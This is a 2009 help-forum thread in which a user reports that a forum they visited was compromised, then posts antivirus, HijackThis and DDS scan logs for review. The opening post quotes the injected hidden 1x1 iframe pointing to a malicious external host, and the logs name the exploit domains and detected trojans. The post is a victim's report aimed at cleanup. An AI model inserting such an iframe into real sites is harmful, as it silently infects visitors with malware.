Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Possible infection

  • 29-11-2009 8:34pm
    #1
    Closed Accounts Posts: 5,017 ✭✭✭


    Hi on Saturday morning I was browsing another forum when the site was attacked. The attack took the form of injecting code for an iframe into the forum pages. The code was:
    </table> 
    <!-- / forum rules & forum jump --> 
     
    <iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe> 
     
    <br /> 
    <div class="smallfont" align="center">All times are GMT -5. The time now is <span class="time">10:12 PM</span>.</div> 
    <br />
    

    I was using Mozilla SeaMonkey to browse and on first visiting the site I noticed that the Java icon was loaded in my taskbar. This would not usually happen on this forum.

    Many other users anti-virus programs reported a threat but mine, Microsoft Security Essentials, did not.

    Avg reported:

    File name: http://centiyo.com/in.cgi?default\{gzip}
    Malware Name: HTML:RedirME-inf [Trj]

    File Name: http://fuc*thecrisis.biz/lib/index.php
    Threat Name: Exploit Javascript Obfuscation (type 714)

    I'm now concerned that I may have picked up an infection. I ran MBAM and Super AntiSpyware and they came up clean but the Kapersky online scanner picked up an infection.

    Also I found a file called yearsTend.class in the Java control panel Temporary Files. It came from http://fuc*thecrisis.biz/lib/yearsTend.class

    Here are the log files of the scans I've done:

    KASPERSKY ONLINE SCANNER 7.0: scan report
    Sunday, November 29, 2009
    Operating system: Microsoft Windows Vista Home Premium Edition, 32-bit Service Pack 2 (build 6002)
    Kaspersky Online Scanner version: 7.0.26.13
    Last database update: Sunday, November 29, 2009 02:01:28
    Records in database: 3306136

    Scan settings:
    scan using the following database: extended
    Scan archives: yes
    Scan e-mail databases: yes

    Scan area - My Computer:
    C:\
    D:\
    E:\
    F:\
    G:\
    H:\
    I:\

    Scan statistics:
    Objects scanned: 189752
    Threats found: 2
    Infected objects found: 2
    Suspicious objects found: 0
    Scan duration: 01:50:36


    File name / Threat / Threats count
    C:\Users\Lennon\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\60c48694-1ccd8d4f Infected: Trojan-Downloader.Java.Agent.ab 1
    C:\Users\Lennon\Desktop\default\hnvp2lue.slt\Mail\Local Folders\College Inbox Infected: Email-Worm.Win32.Wallon.a 1

    Selected area has been scanned.


    Malwarebytes' Anti-Malware 1.41
    Database version: 3258
    Windows 6.0.6002 Service Pack 2

    29/11/2009 20:08:50
    mbam-log-2009-11-29 (20-08-50).txt

    Scan type: Quick Scan
    Objects scanned: 109216
    Time elapsed: 3 minute(s), 29 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 0
    Registry Values Infected: 0
    Registry Data Items Infected: 0
    Folders Infected: 0
    Files Infected: 0

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    (No malicious items detected)

    Registry Values Infected:
    (No malicious items detected)

    Registry Data Items Infected:
    (No malicious items detected)

    Folders Infected:
    (No malicious items detected)

    Files Infected:
    (No malicious items detected)


    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 20:10:36, on 29/11/2009
    Platform: Windows Vista SP2 (WinNT 6.00.1906)
    MSIE: Internet Explorer v8.00 (8.00.6001.18828)
    Boot mode: Normal

    Running processes:
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Windows\system32\taskeng.exe
    C:\Program Files\Dell Support Center\bin\sprtcmd.exe
    C:\Program Files\COMODO\Firewall\cfp.exe
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Microsoft Security Essentials\msseces.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\Windows\ehome\ehtray.exe
    C:\Windows\ehome\ehmsas.exe
    C:\Program Files\SABnzbd\SABnzbd.exe
    C:\Program Files\AutoHotkey\AutoHotkey.exe
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
    C:\Program Files\Mozilla Thunderbird\thunderbird.exe
    C:\Program Files\SeaMonkey\seamonkey.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Windows\system32\NOTEPAD.EXE
    C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
    C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\SearchFilterHost.exe
    C:\Users\Lennon\Desktop\HijackThis.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ie/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer provided by Dell
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
    O1 - Hosts: ::1 localhost
    O2 - BHO: Shareaza Web Download Hook - {0EEDB912-C5FA-486F-8334-57288578C627} - C:\Program Files\Shareaza\RazaWebHook32.dll
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\Dell\BAE\BAE.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
    O4 - HKLM\..\Run: [dscactivate] "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe"
    O4 - HKLM\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
    O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
    O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
    O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
    O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
    O4 - HKLM\..\Run: [MSSE] "c:\Program Files\Microsoft Security Essentials\msseces.exe" -hide
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
    O4 - HKCU\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
    O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
    O4 - HKCU\..\Run: [Google Update] "C:\Users\Lennon\AppData\Local\Google\Update\GoogleUpdate.exe" /c
    O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-21-1411996874-1301283773-3185572280-1003\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'postgres')
    O4 - Global Startup: SABnzbd.lnk = C:\Program Files\SABnzbd\SABnzbd.exe
    O4 - Global Startup: WindowPad.ahk.lnk = C:\AHK\WindowPad\WindowPad.ahk
    O8 - Extra context menu item: Download with &Shareaza - res://C:\Program Files\Shareaza\RazaWebHook32.dll/3000
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
    O9 - Extra 'Tools' menuitem: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
    O9 - Extra 'Tools' menuitem: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
    O9 - Extra button: Gnuf Poker - {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - C:\Gnuf\Poker\MPPoker.exe
    O9 - Extra button: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
    O9 - Extra 'Tools' menuitem: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
    O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
    O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
    O9 - Extra button: Purple Lounge - {00000000-0000-0000-0000-000000000000} - C:\MicroGaming\Poker\PurpleLoungeMPP\MPPoker.exe (HKCU)
    O9 - Extra button: CarbonPoker - {e4e8c758-34b4-44bb-8ef9-1f0786e81d2d} - C:\Users\Lennon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CarbonPoker\CarbonPoker.lnk (file missing) (HKCU)
    O13 - Gopher Prefix:
    O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} (FlashXControl Object) - https://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
    O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    O17 - HKLM\System\CS1\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    O17 - HKLM\System\CS2\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    O20 - AppInit_DLLs: C:\Windows\system32\guard32.dll
    O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
    O23 - Service: Andrea RT Filters Service (AERTFilters) - Andrea Electronics Corporation - C:\Windows\system32\AERTSrv.exe
    O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
    O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
    O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - COMODO - C:\Program Files\COMODO\Firewall\cmdagent.exe
    O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
    O23 - Service: Google Update Service (gupdate1c9e852b942f080) (gupdate1c9e852b942f080) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: PostgreSQL Server 8.3 (postgresql-8.3) - PostgreSQL Global Development Group - C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe
    O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe
    O23 - Service: SupportSoft Sprocket Service (dellsupportcenter) (sprtsvc_dellsupportcenter) - SupportSoft, Inc. - C:\Program Files\Dell Support Center\bin\sprtsvc.exe
    O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
    O23 - Service: TVersityMediaServer - Unknown owner - C:\Users\Lennon\AppData\Local\TVersity\Media Server\MediaServer.exe

    --
    End of file - 9277 bytes


    Rooter.exe (v1.0.2) by Eric_71
    .
    SeDebugPrivilege granted successfully ...
    .
    Windows Vista Home Edition (6.0.6002) Service Pack 2
    [32_bits] - x86 Family 6 Model 15 Stepping 11, GenuineIntel
    .
    [wscsvc] (Security Center) RUNNING (state:4)
    [MpsSvc] RUNNING (state:4)
    Windows Firewall -> Disabled !
    Windows Defender -> Disabled !
    User Account Control (UAC) -> Disabled !
    .
    Internet Explorer 8.0.6001.18828
    Mozilla Firefox 3.5.5 (en-GB)
    .
    C:\ [Fixed-NTFS] .. ( Total:239 Go - Free:92 Go )
    D:\ [Fixed-NTFS] .. ( Total:9 Go - Free:5 Go )
    E:\ [CD_Rom]
    F:\ [Removable]
    G:\ [Removable]
    H:\ [Removable]
    I:\ [Removable]
    .
    Scan : 20:11.25
    Path : C:\Users\Lennon\Desktop\Rooter.exe
    User : Lennon ( Administrator -> YES )
    .
    \\ Processes
    .
    Locked [System Process] (0)
    Locked System (4)
    ______ \SystemRoot\System32\smss.exe (536)
    ______ C:\Windows\system32\csrss.exe (604)
    ______ C:\Windows\system32\wininit.exe (668)
    ______ C:\Windows\system32\csrss.exe (680)
    ______ C:\Windows\system32\services.exe (712)
    ______ C:\Windows\system32\lsass.exe (724)
    ______ C:\Windows\system32\lsm.exe (732)
    ______ C:\Windows\system32\svchost.exe (884)
    ______ C:\Windows\system32\winlogon.exe (896)
    ______ C:\Windows\system32\svchost.exe (968)
    ______ C:\Program Files\COMODO\Firewall\cmdagent.exe (1008)
    ______ C:\Windows\system32\svchost.exe (1056)
    ______ c:\Program Files\Microsoft Security Essentials\MsMpEng.exe (1076)
    ______ C:\Windows\system32\atiesrxx.exe (1280)
    ______ C:\Windows\System32\svchost.exe (1328)
    ______ C:\Windows\System32\svchost.exe (1372)
    ______ C:\Windows\system32\svchost.exe (1384)
    Locked audiodg.exe (1476)
    ______ C:\Windows\system32\svchost.exe (1500)
    ______ C:\Windows\system32\SLsvc.exe (1520)
    ______ C:\Windows\system32\svchost.exe (1548)
    ______ C:\Windows\system32\atieclxx.exe (1704)
    ______ C:\Windows\System32\spoolsv.exe (1964)
    ______ C:\Windows\system32\svchost.exe (1996)
    ______ C:\Windows\system32\taskeng.exe (1316)
    ______ C:\Windows\system32\Dwm.exe (1720)
    ______ C:\Windows\Explorer.EXE (352)
    ______ C:\Windows\system32\taskeng.exe (2084)
    ______ C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe (2192)
    ______ C:\Program Files\Dell Support Center\bin\sprtcmd.exe (2336)
    ______ C:\Program Files\COMODO\Firewall\cfp.exe (2344)
    ______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (2448)
    ______ C:\Windows\RtHDVCpl.exe (2524)
    ______ C:\Program Files\Microsoft Security Essentials\msseces.exe (2612)
    ______ C:\Program Files\iTunes\iTunesHelper.exe (2624)
    ______ C:\Program Files\Java\jre6\bin\jusched.exe (2632)
    ______ C:\Windows\ehome\ehtray.exe (2648)
    ______ C:\Windows\system32\AERTSrv.exe (2828)
    ______ C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe (2840)
    ______ C:\Program Files\Bonjour\mDNSResponder.exe (2852)
    ______ C:\Windows\ehome\ehmsas.exe (3216)
    ______ C:\Program Files\SABnzbd\SABnzbd.exe (3228)
    ______ C:\Program Files\AutoHotkey\AutoHotkey.exe (3244)
    ______ C:\Windows\System32\svchost.exe (3360)
    ______ C:\Windows\system32\svchost.exe (3372)
    ______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (3656)
    ______ C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe (3784)
    ______ C:\Program Files\Dell Support Center\bin\sprtsvc.exe (3800)
    ______ C:\Windows\system32\svchost.exe (3816)
    ______ C:\Windows\System32\svchost.exe (3892)
    ______ C:\Windows\system32\SearchIndexer.exe (3912)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (4072)
    ______ C:\Windows\system32\WUDFHost.exe (2532)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2792)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (1556)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2992)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (3076)
    ______ C:\Program Files\iPod\bin\iPodService.exe (3432)
    ______ C:\Windows\system32\SearchProtocolHost.exe (1464)
    ______ C:\Program Files\Mozilla Thunderbird\thunderbird.exe (5376)
    ______ C:\Program Files\SeaMonkey\seamonkey.exe (4708)
    ______ C:\Program Files\Mozilla Firefox\firefox.exe (6056)
    ______ C:\Windows\system32\NOTEPAD.EXE (1664)
    ______ C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (5120)
    ______ C:\Windows\system32\NOTEPAD.EXE (4836)
    ______ C:\Windows\system32\SearchFilterHost.exe (4796)
    ______ C:\Users\Lennon\Desktop\HijackThis.exe (2996)
    ______ C:\Windows\system32\wbem\wmiprvse.exe (5476)
    ______ C:\Windows\system32\NOTEPAD.EXE (1204)
    ______ C:\Users\Lennon\Desktop\Rooter.exe (1092)
    .
    \\ Device\Harddisk0\
    .
    \Device\Harddisk0 [Sectors : 63 x 512 Bytes]
    .
    \Device\Harddisk0\Partition1 (Start_Offset:32256 | Length:73995264)
    \Device\Harddisk0\Partition2 (Start_Offset:74448896 | Length:10737418240)
    \Device\Harddisk0\Partition3 --[ MBR ]-- (Start_Offset:10811867136 | Length:256830865408)
    \Device\Harddisk0\Partition0 (Start_Offset:267642732544 | Length:52428800000)
    \Device\Harddisk0\Partition4 (Start_Offset:267643781120 | Length:52427751424)
    .
    \\ Scheduled Tasks
    .
    C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001Core.job
    C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001UA.job
    C:\Windows\Tasks\SA.DAT
    C:\Windows\Tasks\SCHEDLGU.TXT
    .
    \\ Registry
    .
    .
    \\ Files & Folders
    .
    \\ Scan completed at 20:11.39
    .
    C:\Rooter$\Rooter_1.txt - (29/11/2009 | 20:11.39)

    I would be grateful if someone could tell me if these look ok. Thanks in advance.


Comments

  • Closed Accounts Posts: 1,970 ✭✭✭ActorSeeksJob


    looks ok

    Please download DDS and save it to your desktop.
    • Disable any script blocking protection
    • Double click dds.pif to run the tool.
    • When done, two DDS.txts will open.
    • Save both reports to your desktop.


    Please include the contents of the following in your next reply:

    DDS.txt
    Attach.txt.


  • Closed Accounts Posts: 5,017 ✭✭✭tsue921i8wljb3


    Thanks very much for the quick response. Here are the requested files:


    DDS (Ver_09-11-29.01) - NTFSx86
    Run by Lennon at 0:10:26.94 on 30/11/2009
    Internet Explorer: 8.0.6001.18828 BrowserJavaVersion: 1.6.0_17
    Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.353.1033.18.3069.1420 [GMT 0:00]

    SP: COMODO Defense+ *enabled* (Updated) {043803A4-4F86-4ef7-AFC5-F6E02A79969B}
    SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}
    SP: SUPERAntiSpyware *disabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}
    FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}

    ============== Running Processes ===============

    C:\Windows\system32\wininit.exe
    C:\Windows\system32\lsm.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch
    C:\Windows\system32\svchost.exe -k rpcss
    C:\Program Files\COMODO\Firewall\cmdagent.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    c:\Program Files\Microsoft Security Essentials\MsMpEng.exe
    C:\Windows\system32\atiesrxx.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    C:\Windows\system32\svchost.exe -k netsvcs
    C:\Windows\system32\svchost.exe -k GPSvcGroup
    C:\Windows\system32\SLsvc.exe
    C:\Windows\system32\svchost.exe -k LocalService
    C:\Windows\system32\atieclxx.exe
    C:\Windows\System32\spoolsv.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Windows\system32\taskeng.exe
    C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe
    C:\Program Files\COMODO\Firewall\cfp.exe
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Microsoft Security Essentials\msseces.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\Windows\ehome\ehtray.exe
    C:\Windows\system32\AERTSrv.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Windows\ehome\ehmsas.exe
    C:\Program Files\SABnzbd\SABnzbd.exe
    C:\Program Files\AutoHotkey\AutoHotkey.exe
    C:\Windows\System32\svchost.exe -k HPZ12
    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
    C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe
    C:\Program Files\Dell Support Center\bin\sprtsvc.exe
    C:\Windows\system32\svchost.exe -k imgsvc
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    C:\Windows\system32\SearchIndexer.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Windows\system32\WUDFHost.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\SeaMonkey\seamonkey.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
    C:\Windows\system32\SearchProtocolHost.exe
    C:\Windows\system32\SearchFilterHost.exe
    c:\Program Files\Microsoft Security Essentials\MpCmdRun.exe
    C:\Users\Lennon\Desktop\dds.pif
    C:\Windows\system32\conime.exe
    C:\Windows\system32\wbem\wmiprvse.exe

    ============== Pseudo HJT Report ===============

    uStart Page = hxxp://www.google.ie/
    uWindow Title = Internet Explorer provided by Dell
    uInternet Settings,ProxyOverride = *.local
    BHO: Shareaza Web Download Hook: {0eedb912-c5fa-486f-8334-57288578c627} - c:\program files\shareaza\RazaWebHook32.dll
    BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
    BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: CBrowserHelperObject Object: {ca6319c0-31b7-401e-a518-a07c3db8f777} - c:\program files\dell\bae\BAE.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
    uRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
    uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
    uRun: [Google Update] "c:\users\lennon\appdata\local\google\update\GoogleUpdate.exe" /c
    mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    mRun: [StartCCC] "c:\program files\ati technologies\ati.ace\core-static\CLIStart.exe" MSRun
    mRun: [dscactivate] "c:\program files\dell support center\gs_agent\custom\dsca.exe"
    mRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
    mRun: [COMODO Firewall Pro] "c:\program files\comodo\firewall\cfp.exe" -h
    mRun: [AppleSyncNotifier] c:\program files\common files\apple\mobile device support\bin\AppleSyncNotifier.exe
    mRun: [RtHDVCpl] RtHDVCpl.exe
    mRun: [COMODO Internet Security] "c:\program files\comodo\firewall\cfp.exe" -h
    mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
    mRun: [MSSE] "c:\program files\microsoft security essentials\msseces.exe" -hide
    mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
    mRun: [SunJavaUpdateSched] "c:\program files\java\jre6\bin\jusched.exe"
    StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\sabnzbd.lnk - c:\program files\sabnzbd\SABnzbd.exe
    StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\window~1.lnk - c:\ahk\windowpad\WindowPad.ahk
    mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
    mPolicies-system: EnableLUA = 0 (0x0)
    mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
    IE: Download with &Shareaza - c:\program files\shareaza\RazaWebHook32.dll/3000
    IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office11\EXCEL.EXE/3000
    IE: {49783ED4-258D-4f9f-BE11-137C18D3E543} - c:\poker\titan poker\casino.exe
    IE: {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - c:\poker\cdpoker\casino.exe
    IE: {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - c:\gnuf\poker\MPPoker.exe
    IE: {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - c:\poker\noble poker\casino.exe
    IE: {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - c:\programs\partygaming\partypoker\RunApp.exe
    IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office11\REFIEBAR.DLL
    DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
    DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
    DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} - hxxps://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
    DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    TCP: {019BBC51-493A-48CD-8901-399505DA1F8B} = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.dll
